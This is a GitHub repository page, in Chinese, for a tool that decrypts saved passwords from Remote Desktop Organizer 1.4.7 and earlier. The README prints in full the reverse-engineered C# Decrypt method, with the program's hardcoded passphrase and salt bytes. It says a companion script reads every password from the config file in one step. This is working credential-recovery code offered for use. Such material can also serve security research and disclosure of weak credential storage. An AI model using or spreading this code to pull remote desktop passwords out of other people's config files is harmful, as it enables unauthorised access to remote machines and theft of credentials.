Skip to content

Remote Desktop Organizer 密码破解

Notifications You must be signed in to change notification settings

codecopy/RDODecrypt

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

RDODecrypt

Remote Desktop Organizer (RDO) <= 1.4.7 密码解密

逆向程序把关键解密方法拿出来用就好了,我顺便写了个反序列化配置文件一键读取密码。

关键解密方法:

        public static string Decrypt(string string_0)
        {
            try
            {
                string strPassword = "swevA2t62We?5Cr+he4Tac?_E!redafa?re5+2huv*$rU9eS8Ub4?W!!R+s7uthU";
                byte[] array = new byte[string_0.Length / 2];
                for (int i = 0; i < string_0.Length / 2; i++)
                {
                    int num = Convert.ToInt32(string_0.Substring(i * 2, 2), 16);
                    array[i] = (byte)num;
                }
                PasswordDeriveBytes passwordDeriveBytes = new PasswordDeriveBytes(strPassword, new byte[]
                {
                    73, 118, 97, 110, 32, 77, 101, 100, 118, 101, 100, 101, 118
                });
                MemoryStream memoryStream = new MemoryStream();
                Rijndael rijndael = Rijndael.Create();
                rijndael.Key = passwordDeriveBytes.GetBytes(32);
                rijndael.IV = passwordDeriveBytes.GetBytes(16);
                CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndael.CreateDecryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(array, 0, array.Length);
                cryptoStream.Close();
                return Encoding.Unicode.GetString(memoryStream.ToArray());
            }
            catch (Exception)
            {
                return "";
            }

        }

01

About

Remote Desktop Organizer 密码破解

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C# 100.0%